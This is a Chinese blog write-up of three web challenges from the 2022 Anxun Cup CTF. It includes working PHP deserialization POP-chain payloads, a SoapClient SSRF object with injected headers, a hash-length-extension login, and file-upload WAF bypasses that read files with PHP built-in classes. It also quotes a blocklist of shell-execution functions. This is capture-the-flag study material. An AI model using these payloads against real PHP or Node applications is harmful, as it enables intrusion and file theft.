<!DOCTYPE html>
<html lang="zh-CN">
    
    <head>
    <meta charset="utf-8">
    <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0,  viewport-fit=cover" name="viewport" />
    <meta name="description" content="2022安洵杯部分wp" />
    <meta name="hexo-theme-A4" content="v1.8.2" />
    <link rel="alternate icon" type="image/webp" href="/img/favicon.webp">
    <title>v2ish1yan</title>

    
        
<link rel="stylesheet" href="/css/a11y-dark.min.css">

        
<link rel="stylesheet" href="/css/reset.css">

        
<link rel="stylesheet" href="/css/markdown.css">

        
<link rel="stylesheet" href="/css/fonts.css">
 
         <!--注意：首页既不是post也不是page-->
        
            
<link rel="stylesheet" href="/css/waline.css">

        
        
        
<link rel="stylesheet" href="/css/ui.css">
 
        
<link rel="stylesheet" href="/css/style.css">


        
            <!--返回顶部css-->
            
<link rel="stylesheet" href="/css/returnToTop.css">

            
<link rel="stylesheet" href="/css/unicons.css">

        
        
            <!--目录-->
            
<link rel="stylesheet" href="/css/toc.css">

        
    
    

<meta name="generator" content="Hexo 6.3.0"></head>
    
    <style>
        :root {
            --waline-theme-color: #000000; 
            --waline-color: #000000; 
            --waline-border-color: #000000; 
            --waline-white: #000000; 
            --waline-bgcolor-light: #ffffff;  
        }
        body {
            color: #000000;
            background: #e4e4e4;
        }
        .post-md code {
            background: #212425;
            color: white; 
        }
        .year-font-color {
            color: #000000 !important;
        }
        .wl-card span.wl-nick {
            color: #000000; 
        }
        .wl-card .wl-badge {
            border: 1px solid #000000;
            color: #000000; 
        }
        .wl-btn {
            border: 1px solid #000000; 
            color:  #000000;  
        }
        .wl-btn.primary {
            color: #ffffff; 
        }
        .wl-header label {
            color: #000000;
        }
        a {
            color: rgb(239, 112, 96);
        }

        .post-md a {
            color: rgb(239, 112, 96);
        }

        .nav li a {
            color: rgb(239, 112, 96);
        }

        .archive-main a:link {
            color: rgb(239, 112, 96);
        }
        .archive-main a:visited {
            color: rgb(239, 112, 96); 
        }

        .archive li span {
            color: #000000;
        }

        .post-main-title {
            color: #000000;
        }

        .post-md h1,
        .post-md h2,
        .post-md h3,
        .post-md h4,
        .post-md h5,
        .post-md h6 {
            color: #000000;
        }

        [data-waline] p {
            color: #000000;
        }
        [data-waline] a {
            color: #000000;
        } 
        .wl-sort li.active {
            color: #000000;
        }

        .wl-card .wl-meta>span {
            background: #ffffff;
        }

        .paper {
            background: #e4e4e4;
        }

        .index-main {
            background: #ffffff;
        }

        .paper-main {
            background: #ffffff;
        }

        .wl-panel {
            background: #ffffff;
        }

        .archive li:nth-child(odd) {
            background: #ffffff;
            ;
        }

        .archive li:nth-child(even) {
            background: #ffffff;
        }

        .post-md>table tr:nth-child(odd) td {
            background: #ffffff;
        }

        .post-md>table tr:nth-child(even) td {
            background: #ffffff;
        }

    
        .progress-wrap::after {
            color: #000000; /* 箭头的颜色 */
        }
        .progress-wrap svg.progress-circle path {
	        stroke: #000000; /* 边框的颜色 */
        }
        .progress-wrap::before {
	        background-image: linear-gradient(298deg, rgb(239, 112, 96), rgb(239, 112, 96)); /* 鼠标滑过的箭头颜色 */
         }

         .left-toc-container::-webkit-scrollbar-thumb {
            background-color: #000000; /* 设置滚动条拖动块的颜色 */
        }

        .bs-docs-sidebar .nav>.active>a,
        .bs-docs-sidebar .nav>li>a:hover,
        .bs-docs-sidebar .nav>li>a:focus {
            color: rgb(239, 112, 96);
            border-left-color: rgb(239, 112, 96);
        }
        .bs-docs-sidebar .nav>li>a {
            color:  #000000;
        }
    </style>

    
    <body>
        
            <div class="left-toc-container">
                <nav id="toc" class="bs-docs-sidebar"></nav>
            </div>
        
        <div class="paper">
            
            
            
            
                <div class="shadow-drop-2-bottom paper-main">
                    
<div class="header">
    <div class="header-container">
        <img style="
        width: 56px;
        height: auto;" alt="^-^" cache-control="max-age=86400" class="header-img" src="/img/favicon.webp" width="10%"></img>
        <div class="header-content">
            <a class="logo" href="/">v2ish1yan</a> 
            <span class="description">一切都是兴趣使然</span> 
        </div>
        
    </div>
    
   
    <ul class="nav">
        
            
                <li><a href="/">首页</a></li>
            
        
            
                <li><a href="/list/">文章</a></li>
            
        
            
                <li><a href="/tags/">标签</a></li>
            
        
            
                <li><a href="/categories/">分类</a></li>
            
        
            
                <li><a href="/about/">关于</a></li>
            
        
            
                <li><a href="/friends/">友链</a></li>
            
        
    </ul>
</div> 
        
                    
                    

                    
                    
                    
                    <!--说明是文章post页面-->
                    
                        <div class="post-main">

    
        <div class="post-main-title">
            2022安洵杯部分wp
        </div>
      
    

    <div class="post-md">
        
            
                <ol class="post-toc"><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#babyphp"><span class="post-toc-text">babyphp</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#0x01"><span class="post-toc-text">0x01</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#0x02-session%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="post-toc-text">0x02 session反序列化</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#%E5%A6%82%E4%BD%95ssrf"><span class="post-toc-text">如何ssrf</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#CSRF"><span class="post-toc-text">CSRF</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#%E5%8E%9F%E7%94%9F%E7%B1%BB"><span class="post-toc-text">原生类</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#%E6%9E%84%E9%80%A0session%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="post-toc-text">构造session反序列化</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#exp"><span class="post-toc-text">exp</span></a></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#%E7%9B%B8%E5%85%B3%E9%93%BE%E6%8E%A5"><span class="post-toc-text">相关链接</span></a></li></ol></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#ezjs"><span class="post-toc-text">ezjs</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#ezupload"><span class="post-toc-text">ezupload</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#0x00"><span class="post-toc-text">0x00</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#0x01-%E7%BB%95%E8%BF%87%E8%BF%87%E6%BB%A4"><span class="post-toc-text">0x01 绕过过滤</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#0x02-%E5%8E%9F%E7%94%9F%E7%B1%BB%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6"><span class="post-toc-text">0x02 原生类读取文件</span></a></li></ol></li></ol>
            
        
        <h1 id="babyphp"><a href="#babyphp" class="headerlink" title="babyphp"></a>babyphp</h1><ul>
<li>session反序列化</li>
<li>SSRF</li>
<li>原生类</li>
<li>CSRF</li>
<li>fastdestruct</li>
</ul>
<h2 id="0x01"><a href="#0x01" class="headerlink" title="0x01"></a>0x01</h2><p>就是session反序列化搭配原生类进行ssrf</p>
<p>index.php</p>
<pre><code class="php">&lt;?php
//something in flag.php

class A
&#123;
    public $a;
    public $b;

    public function __wakeup()
    &#123;
        $this-&gt;a = &quot;babyhacker&quot;;
    &#125;

    public function __invoke()
    &#123;
        if (isset($this-&gt;a) &amp;&amp; $this-&gt;a == md5($this-&gt;a)) &#123;
            $this-&gt;b-&gt;uwant();
        &#125;
    &#125;
&#125;

class B
&#123;
    public $a;
    public $b;
    public $k;

    function __destruct()
    &#123;
        $this-&gt;b = $this-&gt;k;
        die($this-&gt;a);
    &#125;
&#125;

class C
&#123;
    public $a;
    public $c;

    public function __toString()
    &#123;
        $cc = $this-&gt;c;
        return $cc();
    &#125;
    public function uwant()
    &#123;
        if ($this-&gt;a == &quot;phpinfo&quot;) &#123;
            phpinfo();
        &#125; else &#123;
            call_user_func(array(reset($_SESSION), $this-&gt;a));
        &#125;
    &#125;
&#125;


if (isset($_GET[&#39;d0g3&#39;])) &#123;
    ini_set($_GET[&#39;baby&#39;], $_GET[&#39;d0g3&#39;]);
    session_start();
    $_SESSION[&#39;sess&#39;] = $_POST[&#39;sess&#39;];
&#125;
else&#123;
    session_start();
    if (isset($_POST[&quot;pop&quot;])) &#123;
        unserialize($_POST[&quot;pop&quot;]);
    &#125;
&#125;
var_dump($_SESSION);
highlight_file(__FILE__);
</code></pre>
<p>flag.php</p>
<pre><code class="php">&lt;?php
session_start();
highlight_file(__FILE__);
//flag在根目录下
if($_SERVER[&quot;REMOTE_ADDR&quot;]===&quot;127.0.0.1&quot;)&#123;
    $f1ag=implode(array(new $_GET[&#39;a&#39;]($_GET[&#39;b&#39;])));
    $_SESSION[&quot;F1AG&quot;]= $f1ag;
&#125;else&#123;
   echo &quot;only localhost!!&quot;;
&#125;
</code></pre>
<p>查看phpinfo的pop</p>
<p>这里使用fastdestruct来使destruct在<code>__wakeup</code>前执行，就能绕过</p>
<pre><code class="php">&lt;?php
//something in flag.php

class A
&#123;
    public $a;
    public $b;

&#125;

class B
&#123;
    public $a;
    public $b;
    public $k;
&#125;
class C
&#123;
    public $a;//phpinfo
    public $c;

&#125;
$a=new A;
$b=new B;
$c=new C;
$b-&gt;a=$c;
$a-&gt;a=&#39;0e215962017&#39;; //isset($this-&gt;a) &amp;&amp; $this-&gt;a == md5($this-&gt;a)
$a-&gt;b=$c;
$c-&gt;a=&#39;phpinfo&#39;;
$c-&gt;c=$a;
echo serialize($b);
</code></pre>
<p>payload:</p>
<pre><code>pop=O:1:&quot;B&quot;:3:&#123;s:1:&quot;a&quot;;O:1:&quot;C&quot;:2:&#123;s:1:&quot;a&quot;;s:7:&quot;phpinfo&quot;;s:1:&quot;c&quot;;O:1:&quot;A&quot;:2:&#123;s:1:&quot;a&quot;;s:11:&quot;0e215962017&quot;;s:1:&quot;b&quot;;r:2;&#125;&#125;s:1:&quot;b&quot;;N;s:1:&quot;k&quot;;N;
</code></pre>
<h2 id="0x02-session反序列化"><a href="#0x02-session反序列化" class="headerlink" title="0x02 session反序列化"></a>0x02 session反序列化</h2><h3 id="如何ssrf"><a href="#如何ssrf" class="headerlink" title="如何ssrf"></a>如何ssrf</h3><p>可以在类中看到调用<code>call_user_func(array(reset($_SESSION), $this-&gt;a))</code></p>
<p>这里call_user_func的用法，就是执行类中的静态函数或者一个对象的方法</p>
<p>如果我们要ssrf访问flag.php,我们就使用原生类<code>SoapClient</code>该内置类有一个 <code>__call</code> 方法，当 <code>__call</code> 方法被触发后，它可以发送 HTTP 和 HTTPS 请求。正是这个 <code>__call</code> 方法，使得 SoapClient 类可以被我们运用在 SSRF 中。SoapClient 这个类也算是目前被挖掘出来最好用的一个内置类。</p>
<p>同时<code>__call</code>的触发方法就是在调用这个对象不存在的一个方法时触发，刚好符合我们的需求</p>
<h3 id="CSRF"><a href="#CSRF" class="headerlink" title="CSRF"></a>CSRF</h3><p>在<code>SoapClient</code>里有个<code>user_agent</code>参数，可以使用我们自己设置的header，可以使用CSRF来达到大部分http头我们可控</p>
<p>经过测试，要打ssrf成功需要同时存在两个头</p>
<p>PHPSESSID要一致</p>
<pre><code>&#39;X-Forwarded-For: 127.0.0.1&#39;,
&#39;Cookie: PHPSESSID=kod01dgtpdrd999ms9vqa8l5hl&#39; 
</code></pre>
<h3 id="原生类"><a href="#原生类" class="headerlink" title="原生类"></a>原生类</h3><p>ssrf后我们可以看到有</p>
<pre><code class="php">implode(array(new $_GET[&#39;a&#39;]($_GET[&#39;b&#39;])));
</code></pre>
<p>这里使用php原生类配合glob协议进行目录遍历和读取文件内容，依靠的是触发他们的<code>__toString()</code>魔术方法</p>
<pre><code class="php">&lt;?php
new DirectoryIterator(&quot;glob:///*f*&quot;);//查找根目录下名字带f的文件，也可以使用?作为通配符
new SplFileObject(&#39;/flag&#39;);//读取文件
</code></pre>
<h3 id="构造session反序列化"><a href="#构造session反序列化" class="headerlink" title="构造session反序列化"></a>构造session反序列化</h3><p>在代码中可以看到有一下代码</p>
<pre><code class="php">ini_set($_GET[&#39;baby&#39;], $_GET[&#39;d0g3&#39;]);
</code></pre>
<p>因为session有多种不同的序列化引擎，利用这种不同点，来造成反序列化</p>
<pre><code>php_binary:存储方式是，键名的长度对应的ASCII字符+键名+经过serialize()函数序列化处理的值
php:存储方式是，键名+竖线+经过serialize()函数序列处理的值
php_serialize(php&gt;5.5.4):存储方式是，经过serialize()函数序列化处理的值
</code></pre>
<pre><code>当会话自动开始或者通过 session_start() 手动开始的时候， PHP 内部会调用会话管理器的 open 和 read 回调函数。通过 read 回调函数返回的现有会话数据（使用特殊的序列化格式存储）， PHP 会自动反序列化数据并且填充 $_SESSION 超级全局变量。
</code></pre>
<p>题目环境默认是php引擎，我们可以先使用php_serialize引擎，在前面加上<code>|</code>(竖线)</p>
<p>这样，在使用php引擎的时候，就会把<code>|</code>(竖线)后面的内容反序列化，并且填充 $_SESSION 超级全局变量。</p>
<p>这样就可以使<code>$_SESSION</code>里有SoapClient对象了。</p>
<hr>
<p>其他知识</p>
<blockquote>
<p><strong>session_start</strong> 函数从 <strong>PHP7</strong> 开始允许通过参数来设置 <strong>session</strong> 运行时配置。例如： <code>session_start(array(&#39;serialize_handler&#39; =&gt; &#39;php_serialize&#39;))</code></p>
</blockquote>
<h3 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h3><p>构造session序列化</p>
<pre><code class="php">&lt;?php
$target=&#39;http://127.0.0.1:80/flag.php?a=SplFileObject&amp;b=/f1111llllllaagg&#39;; //自己替换原生类
$post_data=&#39;add=111&#39;;
$ua = array(
    &#39;X-Forwarded-For: 127.0.0.1&#39;,
    &#39;Cookie: PHPSESSID=kod01dgtpdrd999ms9vqa8l5hl&#39;
);
$options = array(
    &#39;location&#39; =&gt; $target,
    &#39;user_agent&#39; =&gt; join(&quot;\r\n&quot;,$ua) . &quot;\r\nContent-Length: &quot; . (string) strlen($post_data). &quot;\r\n\r\n&quot; . $post_data,//post传参的内容可以加可不加
    &#39;uri&#39;=&gt;&#39;v2ish1yan&#39;//随意
);
$a=new SoapClient(null,$options);
echo urlencode(serialize($a));
</code></pre>
<pre><code>O%3A10%3A%22SoapClient%22%3A5%3A%7Bs%3A3%3A%22uri%22%3Bs%3A9%3A%22v2ish1yan%22%3Bs%3A8%3A%22location%22%3Bs%3A63%3A%22http%3A%2F%2F127.0.0.1%3A80%2Fflag.php%3Fa%3DSplFileObject%26b%3D%2Ff1111llllllaagg%22%3Bs%3A15%3A%22_stream_context%22%3Bi%3A0%3Bs%3A11%3A%22_user_agent%22%3Bs%3A102%3A%22X-Forwarded-For%3A+127.0.0.1%0D%0ACookie%3A+PHPSESSID%3Dkod01dgtpdrd999ms9vqa8l5hl%0D%0AContent-Length%3A+7%0D%0A%0D%0Aadd%3D111%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D
</code></pre>
<p>payload</p>
<p>先传这个</p>
<pre><code class="bash">GET: ??d0g3=php_serialize&amp;baby=session.serialize_handler
POST: sess=|O%3A10%3A%22SoapClient%22%3A5%3A%7Bs%3A3%3A%22uri%22%3Bs%3A9%3A%22v2ish1yan%22%3Bs%3A8%3A%22location%22%3Bs%3A63%3A%22http%3A%2F%2F127.0.0.1%3A80%2Fflag.php%3Fa%3DSplFileObject%26b%3D%2Ff1111llllllaagg%22%3Bs%3A15%3A%22_stream_context%22%3Bi%3A0%3Bs%3A11%3A%22_user_agent%22%3Bs%3A102%3A%22X-Forwarded-For%3A+127.0.0.1%0D%0ACookie%3A+PHPSESSID%3Dkod01dgtpdrd999ms9vqa8l5hl%0D%0AContent-Length%3A+7%0D%0A%0D%0Aadd%3D111%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D
</code></pre>
<p>然后再传一个pop，进行反序列化触发<code>SoapClient::__call()</code>进行ssrf</p>
<p>exp</p>
<pre><code class="php">&lt;?php
//something in flag.php

class A
&#123;
    public $a;
    public $b;

&#125;

class B
&#123;
    public $a;
    public $b;
    public $k;
&#125;
class C
&#123;
    public $a;//phpinfo
    public $c;

&#125;
$a=new A;
$b=new B;
$c=new C;
$b-&gt;a=$c;
$a-&gt;a=&#39;0e215962017&#39;; //isset($this-&gt;a) &amp;&amp; $this-&gt;a == md5($this-&gt;a)
$a-&gt;b=$c;
$c-&gt;a=&#39;aaaaaa&#39;;
$c-&gt;c=$a;
echo serialize($b);
</code></pre>
<p>payload</p>
<pre><code class="bash">pop=O:1:&quot;B&quot;:3:&#123;s:1:&quot;a&quot;;O:1:&quot;C&quot;:2:&#123;s:1:&quot;a&quot;;s:6:&quot;phpinf&quot;;s:1:&quot;c&quot;;O:1:&quot;A&quot;:2:&#123;s:1:&quot;a&quot;;s:11:&quot;0e215962017&quot;;s:1:&quot;b&quot;;r:2;&#125;&#125;s:1:&quot;b&quot;;N;s:1:&quot;k&quot;;N;
</code></pre>
<p>然后如果成功会响应一段时间，然后再访问题目连接，查看<code>$SESSION</code>里的flag</p>
<p><img src="https://typero-1312563978.cos.ap-shanghai.myqcloud.com/typero/202211271929975.png" alt="image-20221127192811552"></p>
<h2 id="相关链接"><a href="#相关链接" class="headerlink" title="相关链接"></a>相关链接</h2><p><a target="_blank" rel="noopener" href="https://mochazz.github.io/2019/01/29/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%85%A5%E9%97%A8%E4%B9%8Bsession%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/#PHP%E7%9A%84session%E6%9C%BA%E5%88%B6">https://mochazz.github.io/2019/01/29/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%85%A5%E9%97%A8%E4%B9%8Bsession%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/#PHP%E7%9A%84session%E6%9C%BA%E5%88%B6</a></p>
<p><a target="_blank" rel="noopener" href="http://anquanke.com/post/id/238482">http://anquanke.com/post/id/238482</a></p>
<h1 id="ezjs"><a href="#ezjs" class="headerlink" title="ezjs"></a>ezjs</h1><ul>
<li>哈希扩展攻击</li>
<li>原型链污染</li>
</ul>
<p>直接复制粘贴的别人的公众号</p>
<p>解题思路 </p>
<p>页面提示：</p>
<pre><code>&lt;!--This secret is 7 characters long for security!
hash=md5(secret+&quot;flag&quot;);//1946714cfa9deb70cc40bab32872f98a
admin cookie is   md5(secret+urldecode(&quot;flag%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00X%00%00%00%00%00%00%00dog&quot;));
--&gt;
</code></pre>
<p>联想到哈希拓展长度攻击</p>
<p><img src="https://typero-1312563978.cos.ap-shanghai.myqcloud.com/typero/202211281113291.png" alt="图片"></p>
<p>然后登录</p>
<pre><code>POST /index HTTP/1.1
Host: 47.108.29.107:23333
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/jxl,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 20
Origin: http://47.108.29.107:23333
Connection: close
Referer: http://47.108.29.107:23333/
Cookie: hash=ed63246fb602056fee4a7ec886d0a3c2
Upgrade-Insecure-Requests: 1

pwd=123&amp;userid=Admin
</code></pre>
<p><img src="https://typero-1312563978.cos.ap-shanghai.myqcloud.com/typero/202211281113319.png" alt="图片"></p>
<p>登录成功后提示infoflllllag 页面，访问后得到源代码：</p>
<pre><code class="js">var express = require(&#39;express&#39;);
var router = express.Router();
const isObject = obj = &gt;obj &amp;&amp; obj.constructor &amp;&amp; obj.constructor === Object;
const merge = (a, b) = &gt;&#123;
    for (var attr in b) &#123;
        if (isObject(a[attr]) &amp;&amp; isObject(b[attr])) &#123;
            merge(a[attr], b[attr]);
        &#125; else &#123;
            a[attr] = b[attr];
        &#125;
    &#125;
    return a
&#125;

const clone = (a) = &gt;&#123;
    return merge(&#123;&#125;,
    a);
&#125;
router.get(&#39;/&#39;,
function(req, res, next) &#123;
    if (req.flag == &quot;flag&quot;) &#123;
        flag;
        res.send(&#39;flag?????????????&#39;);
    &#125;
    res.render(&#39;info&#39;);
&#125;);
router.post(&#39;/&#39;, express.json(),
function(req, res) &#123;
    var str = req.body.id;
    var obj = JSON.parse(str);
    req.cookies.id = clone(obj);
    res.render(&#39;info&#39;);
&#125;);
module.exports = router;
</code></pre>
<p>后面改成了公用环境就去写了个监控脚本，因为一般做的原型链污染的题是第一次构造payload访问进行污染，第二次才是执行。就写了个监控内容的脚本挂着了，分别监控了&#x2F;,&#x2F;infoflllllag,&#x2F;Cookie 。不知道题目错误还是上车了：在&#x2F;infoflllllag页面弄到了flag</p>
<p><img src="https://typero-1312563978.cos.ap-shanghai.myqcloud.com/typero/202211281113304.png" alt="图片"></p>
<p>脚本内容：</p>
<pre><code class="python">import requests
url1 = &quot;http://47.108.29.107:23333/infoflllllag&quot;
url2 = &quot;http://47.108.29.107:23333/Cookie&quot;
url3 = &quot;http://47.108.29.107:23333/&quot;
with open(&quot;/1.txt&quot;, &quot;a&quot;) as file:
   while True:
      talk  = requests.get(url1)
      talk2 = requests.get(url2)
      talk3 = requests.get(url3)
      file.write(str(talk.text) + &quot;\n&quot;)
      file.write(str(talk2.text) + &quot;\n&quot;)
      file.write(str(talk3.text) + &quot;\n&quot;)
</code></pre>
<p>监控脚本生成的文件1.txt发群里了，cat 1.txt | grep “D0g3”| more的执行结果：</p>
<p><img src="https://typero-1312563978.cos.ap-shanghai.myqcloud.com/typero/202211281113150.png" alt="图片"></p>
<h1 id="ezupload"><a href="#ezupload" class="headerlink" title="ezupload"></a>ezupload</h1><ul>
<li>文件上传</li>
<li>原生类</li>
<li>php转义</li>
</ul>
<h2 id="0x00"><a href="#0x00" class="headerlink" title="0x00"></a>0x00</h2><p>看了别人的wp，发现只跟他们差一步，就是用转义字符绕过对*的过滤😢</p>
<h2 id="0x01-绕过过滤"><a href="#0x01-绕过过滤" class="headerlink" title="0x01 绕过过滤"></a>0x01 绕过过滤</h2><p>在fuzz过程中发现只有php文件能够上传</p>
<p>然后上传php文件，执行phpinfo()可以发现ban了很多函数</p>
<p><img src="https://typero-1312563978.cos.ap-shanghai.myqcloud.com/typero/202211280938249.png" alt="image-20221128093849089"></p>
<p>但是有个函数没被ban，<code>file_get_contents()</code></p>
<p>感觉就是留给我们用的</p>
<p>但是这个字符串在后端被过滤，所以要绕一下</p>
<p>因为php7以上就可以使用动态函数，这里有两种方法来绕</p>
<ul>
<li><p>字符串拼接</p>
<p>我就是这样绕的，但是后面因为*号没有绕过去，所以最后也没做出来</p>
<p><img src="https://typero-1312563978.cos.ap-shanghai.myqcloud.com/typero/202211280953112.png" alt="image-20221128095341021"></p>
</li>
<li><p>字符串转义</p>
<p>使用16进制</p>
<p>脚本</p>
<p>字符串转16进制</p>
<pre><code class="python">def string2hex(str):
    result=&#39;&#39;
    for i in str:
        result+=&#39;\\x&#39;+hex(ord(i))[2:]
    print((&#39;[+] &#123;&#125;=&gt;Convert_to_hex_is:&#123;&#125;&#39;).format(str,result))
if __name__==&#39;__main__&#39;:
    str=input(&#39;code:&#39;)
    string2hex(str)
</code></pre>
<p><img src="https://typero-1312563978.cos.ap-shanghai.myqcloud.com/typero/202211280955720.png" alt="image-20221128095547634"></p>
</li>
</ul>
<h2 id="0x02-原生类读取文件"><a href="#0x02-原生类读取文件" class="headerlink" title="0x02 原生类读取文件"></a>0x02 原生类读取文件</h2><p>可以用file_get_contents获取index.php源码</p>
<pre><code class="php">&lt;?php
function waf($var): bool&#123;
    $blacklist = [&quot;\$_&quot;, &quot;eval&quot;,&quot;copy&quot; ,&quot;assert&quot;,&quot;usort&quot;,&quot;include&quot;, &quot;require&quot;, &quot;$&quot;, &quot;^&quot;, &quot;~&quot;, &quot;-&quot;, &quot;%&quot;, &quot;*&quot;,&quot;file&quot;,&quot;fopen&quot;,&quot;fwriter&quot;,&quot;fput&quot;,&quot;copy&quot;,&quot;curl&quot;,&quot;fread&quot;,&quot;fget&quot;,&quot;function_exists&quot;,&quot;dl&quot;,&quot;putenv&quot;,&quot;system&quot;,&quot;exec&quot;,&quot;shell_exec&quot;,&quot;passthru&quot;,&quot;proc_open&quot;,&quot;proc_close&quot;, &quot;proc_get_status&quot;,&quot;checkdnsrr&quot;,&quot;getmxrr&quot;,&quot;getservbyname&quot;,&quot;getservbyport&quot;, &quot;syslog&quot;,&quot;popen&quot;,&quot;show_source&quot;,&quot;highlight_file&quot;,&quot;`&quot;,&quot;chmod&quot;];

    foreach($blacklist as $blackword)&#123;
        if(stristr($var, $blackword)) return True;
    &#125;

    return False;
&#125;
error_reporting(0);
//设置上传目录
define(&quot;UPLOAD_PATH&quot;, &quot;./uploads&quot;);
$msg = &quot;Upload Success!&quot;;
if (isset($_POST[&#39;submit&#39;])) &#123;
$temp_file = $_FILES[&#39;upload_file&#39;][&#39;tmp_name&#39;];
$file_name = $_FILES[&#39;upload_file&#39;][&#39;name&#39;];
$ext = pathinfo($file_name,PATHINFO_EXTENSION);
if(!preg_match(&quot;/php/i&quot;, strtolower($ext)))&#123;
die(&quot;俺不要图片,熊大&quot;);
&#125;

$content = file_get_contents($temp_file);
if(waf($content))&#123;
    die(&quot;哎呦你干嘛，小黑子...&quot;);
&#125;
$new_file_name = md5($file_name).&quot;.&quot;.$ext;
        $img_path = UPLOAD_PATH . &#39;/&#39; . $new_file_name;


        if (move_uploaded_file($temp_file, $img_path))&#123;
            $is_upload = true;
        &#125; else &#123;
            $msg = &#39;Upload Failed!&#39;;
            die();
        &#125;
        echo $msg.&quot;  &quot;.$img_path;
&#125;
</code></pre>
<p>虽然他过滤了一些东西，但是都是可以绕过的</p>
<p>使用 <code>DirectoryIterator</code>原生类配合glob协议查找flag文件名</p>
<p><img src="https://typero-1312563978.cos.ap-shanghai.myqcloud.com/typero/202211280959801.png" alt="image-20221128095943728"></p>
<pre><code class="php">&lt;?php echo new DirectoryIterator(&quot;\x67\x6c\x6f\x62\x3a\x2f\x2f\x2f\x2a\x66\x2a&quot;);
//echo new DirectoryIterator(&quot;glob:///*f*&quot;);
</code></pre>
<p>但是我做题的时候发现glob可以使用?作为通配符，所以还可以这样，得一个个试</p>
<pre><code class="php">&lt;?php echo new DirectoryIterator(&quot;glob:///??????????????&quot;);
</code></pre>
<p>但是条件就比较苛刻，需要确定flag长度要这么长，否则相同长度可能会匹配到其他的文件名</p>
<p>(比赛的时候也用了这种方法，但是没有坚持下来😢)</p>
<p>然后使用<code>SplFileObject</code>读取文件</p>
<p><img src="https://typero-1312563978.cos.ap-shanghai.myqcloud.com/typero/202211281004051.png" alt="image-20221128100409982"></p>
<pre><code class="php">&lt;?php echo new (&#39;Spl&#39;.&#39;Fi&#39;.&#39;leObject&#39;)(&quot;/fl1111111111ag&quot;);
</code></pre>

    </div>

    <div class="post-meta">
        <i>
        
            <span>2022-11-29</span>
            
                <span>该篇文章被 v2ish1yan</span>
            
            
                <span>打上标签:
                    
                    
                        <a href='/tags/CTF/'>
                            CTF
                        </a>
                    
                        <a href='/tags/WEB/'>
                            WEB
                        </a>
                    
                </span>
             
             
                <span>归为分类:
                    
                    
                        <a href='/categories/WP/'>
                            WP
                        </a>
                    
                </span>
            
        
        </i>
    </div>
    
        
    <div class="comments-container">
    <div id="comment-anchor"></div>
    <div class="comment-area-title">
         
    </div>
    
        

    <div id="waline"></div>
    <script type="module"  >
        import { init } from 'https://npm.elemecdn.com/hexo-theme-a4@latest/source/js/waline.mjs'; 
        function loadWaline() {
            init({
                el: '#waline',
                serverURL: 'https://a4-talk.vercel.app',
                lang: 'zh-CN',
                dark: 'body[class~="dark-mode"]',
                requiredMeta: ['nick','mail'], // cannot customize by theme config, change it yourself
                search: false, // 禁止表情包搜索
                reaction: false, // 对文章打分
                pageview: false, // 浏览量统计
                comment: false, // 评论数统计

                locale: {
                    placeholder: '欢迎评论', 
                    sofa: ''
                },
            });
            
        }
        window.addEventListener('DOMContentLoaded', loadWaline);
    </script>



    
    
    
    </div>


     
</div>



                                      
                    
                    
                    <div class="footer">
    
        <span> 
            © 1949-2024 China 

            
                

            
        </span>
    
</div>
<!--这是指一条线往下的内容-->
<div class="footer-last">
    
            <span>🌊面朝大海，春暖花开🌸</span>
            
                <span class="footer-last-span-right"><i>本站由<a target="_blank" rel="noopener" href="https://hexo.io/zh-cn/index.html">Hexo</a>驱动｜使用<a target="_blank" rel="noopener" href="https://github.com/HiNinoJay/hexo-theme-A4">Hexo-theme-A4</a>主题</i></span>
            
    
</div>


   
    
<script src="/js/highlight.min.js"></script>

    
<script src="/js/highlightjs-line-numbers.js"></script>


    
<script src="/js/randomHeaderContent.js"></script>

    <!--回到顶部按钮-->
    
        
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.0/jquery.min.js"></script>

        
<script src="/js/returnToTop.js"></script>

    

    <!--目录-->
    
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/1.7.2/jquery.min.js" type="text/javascript" ></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jqueryui/1.12.1/jquery-ui.min.js" type="text/javascript" ></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.tocify/1.9.0/javascripts/jquery.tocify.min.js" type="text/javascript" ></script>
        
<script src="/js/toc.js"></script>

    



<script>
    hljs.initHighlightingOnLoad();
    hljs.initLineNumbersOnLoad();
</script>



                </div>
            
            
